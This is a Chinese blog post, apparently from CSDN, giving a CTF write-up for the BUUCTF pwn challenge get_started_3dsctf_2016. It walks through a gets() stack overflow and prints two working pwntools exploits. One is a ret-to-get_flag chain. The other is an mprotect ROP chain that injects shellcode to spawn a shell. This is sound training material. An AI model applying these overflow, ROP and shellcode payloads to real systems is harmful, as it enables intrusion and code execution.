get_started_3dsctf_2016

最新推荐文章于 2023-07-20 23:01:57 发布
最新推荐文章于 2023-07-20 23:01:57 发布
阅读量150 收藏
点赞数
分类专栏: ctf buuctf 笔记 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/125409231
版权
笔记 同时被 3 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏
buuctf
39 篇文章 0 订阅
订阅专栏

get_started_3dsctf_2016

在这里插入图片描述
checksec 程序是32位的,开了一些问题不大的保护,ida看一下
在这里插入图片描述

main函数

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+4h] [ebp-38h]

  printf("Qual a palavrinha magica? ", v4);
  gets(&v4); #gets函数可以无限溢出
  return 0;
}

get_flag函数

在这里插入图片描述
我们构造a1 == 0x308CD64F && a2 == 0x195719D1 ,然后get_flag函数的返回地址填入exit函数,就可以把flag给带出来

void __cdecl get_flag(int a1, int a2)
{
  int v2; // eax
  int v3; // esi
  unsigned __int8 v4; // al
  int v5; // ecx
  unsigned __int8 v6; // al

  if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) # 判断a1 和 a2如果等于给定的数就读取flag
  {
    v2 = fopen("flag.txt", "rt");
    v3 = v2;
    v4 = getc(v2);
    if ( v4 != 255 )
    {
      v5 = (char)v4;
      do
      {
        putchar(v5);
        v6 = getc(v3);
        v5 = (char)v6;
      }
      while ( v6 != 255 );
    }
    fclose(v3);
  }
}

exp1

from pwn import *

io = process("./get_started_3dsctf_2016")

io = remote("node4.buuoj.cn",26448)
elf = ELF("./get_started_3dsctf_2016")

context(log_level="debug",arch="i386")
get_flag_addr = elf.symbols["get_flag"]
exit_addr = elf.symbols["exit"]
ret_addr = 0x08048196
a1 = 0x308CD64F
a2 = 0x195719D1

print hex(get_flag_addr),hex(exit_addr)

payload = flat(["a"*56,ret_addr,get_flag_addr,exit_addr,a1,a2])
io.sendline(payload)
io.recv()

在这里插入图片描述

mprotect函数

参考 https://blog.csdn.net/qq_32095699/article/details/114225953

在这里插入图片描述

简单的来说这个函数可以给地址赋予权限,也是Linux下的系统函数,他的三个参数
第一个参数填的是一个地址,是指需要进行操作的地址。
第二个参数是地址往后多大的长度。
第三个参数的是要赋予的权限。
这三个参数是存在 ebx esi ebp 中

int __cdecl mprotect(int a1, int a2, int a3)
{
  int result; // eax

  result = dl_sysinfo(a2, a3);
  JUMPOUT(result, -4095, _syscall_error);
  return result;
}

可参考 https://www.wenjiangs.com/doc/dtkwp70q9e#ef45581adcf1589aa9c8efb9d4c10ec4

exp2

第二种方法其实就是利用了mprotect函数给地址可读可写的权限,然后往地址些shellcode然后调用执行,其实也没多复杂

from pwn import *

io = process("./get_started_3dsctf_2016")

io = remote("node4.buuoj.cn",26448)
elf = ELF("./get_started_3dsctf_2016")

context(log_level="debug",arch="i386")
mprotect_addr = elf.symbols["mprotect"]
read_plt = elf.symbols["read"]
pop_ebx_esi_ebp_ret = 0x0804f460 
buf = 0x8048000
print mprotect_addr

payload = flat(["a"*0x38,mprotect_addr,pop_ebx_esi_ebp_ret,buf,0x1000,0x7,read_plt,buf,0,buf,0x200])

io.sendline(payload)
shellcode = asm(shellcraft.sh(),arch='i386')
io.sendline(shellcode)

io.interactive()
[mzq]
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
get_started_3dsctf_2016 题解
lifanxin的博客
12-11 1036
Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未开启。 运行程序: 静态分析 动态调试 求解思路 求解脚本 ...
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
buuoj Pwn writeup 11-20
yongbaoii的博客
01-31 356
11 get_started_3dsctf_2016 保护,简简单单开了个NX。 进去把那个函数名称拉一拉,发现这程序是静态编译的。 看main函数,我直呼好家伙,这句子它先就是个神奇的句子。 很明显一个栈溢出。 很明显看到了关键函数。 栈溢出之后一般32位程序ebp之后就是返回地址,但是在32的main函数中,ebp之后先是三个参数,然后才是返回地址,因为get flag 函数中传入了参数并且对参数有判断,所以在栈溢出的时候返回地址后面写上返回函数的返回地址,再写入两个参数,名满足调用规则,从右往
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1956
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
get_started_complete_Windows编程_
10-02
在本文中,我们将深入探讨"get_started_complete"这个主题,特别是关于Windows编程的入门知识。Windows编程是开发针对Microsoft Windows操作系统应用的过程,它涉及到使用特定的API(应用程序接口)和其他工具来创建...
LinkIt_for_RTOS_Get_Started_Guide.pdf
06-23
LinkIt_for_RTOS_Get_Started_Guide.pdf
解决file_get_contents无法请求https连接的方法
10-26
3. **使用cURL替代file_get_contents**: 如果您无法修改服务器配置,或者上述方法不适用,您可以选择使用cURL库来代替 `file_get_contents`。cURL是一个强大的URL传输库,支持多种协议,包括HTTPS。下面是一个使用...
PHP file_get_contents设置超时处理方法
10-26
今天说的这篇是讲超时的,确实在跨服务器提交的时候,不可避免的会遇到超时的情况,这个时候怎么办?set_time_limit是没有用的,只有用context中的timeout时间来控制
get_started_3dsctf_2016【BUUCTF】(两种解法)
qq_41696518的博客
08-27 1218
get_started_3dsctf_2016
【CTF】get_started_3dsctf_2016
凉水的博客
01-19 613
解题思路: 1 先反编译,第一印象代码比较多、杂,找main函数找了半天才找到。 undefined4 main(void) { char local_38 [56]; printf("Qual a palavrinha magica? "); gets(local_38); return 0; } 2 看main函数,第一感觉是典型的栈溢出。然后就是ELF的一些保护。 Arch: i386-32-little RELRO: Partial RELRO Stack:
【Pwn】get_started_3dsctf_2016
最新发布
ethan18的博客
07-20 213
这是一个有点难度的题目,反正我是后面去看师傅们的wp了。。。这个题目听大家讲本地的和远程的exp居然还是有差别的首先拿到文件,开始老三样查看主要看在哪个平台:32位还是64位,还有就是有没有canary,如果有的话一般来说都不会是栈溢出攻击的题目然后拖进ida这个可以看出真的是一个栈溢出攻击我们还可以看到get_flag函数看出来是直接进行溢出到第8行地址就行。但是注意,可能是由于这题目远程的时候一些奇妙问题,在我们使用远程的时候没有正常退出会导致出错,无法获取回显。
ctf【get_started_3dsctf_2016
HUANGliang_的博客
10-29 176
ret2libc a1 == 0x308CD64F && a2 == 0x195719D1 get_flag函数地址0x80489A0 main函数地址0x8048A20
BUUCTF get_started_3dsctf_2016
红叶的博客
10-29 408
最后必须要返回exit,因为本题没有开启标准输入输出,输入输出会在缓冲区呆着,而exit执行后会将缓冲区输出,则可回显flag。需要 -0x04,因为是32位程序,并且返回地址要改成 get_flag 的地址。溢出 + get_flag地址 + exit + 2个判断条件。溢出 + get_flag地址 + 2个判断条件。但是这个思路还缺少一步。key,key1的地址。
buuctf get_started_3dsctf_2016 wp(python3)
Kata_Jhin的博客
03-14 126
buuctf get_started_3dsctf_2016 wp(python3)
sqlite3_get_table所有操作
05-13
sqlite3_get_table是一个SQLite C/C++ API函数,用于执行SQL查询并返回查询结果。它返回的结果是一个包含查询结果的二维数组。下面是sqlite3_get_table的所有操作: ```c int sqlite3_get_table( sqlite3 *db, /* ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值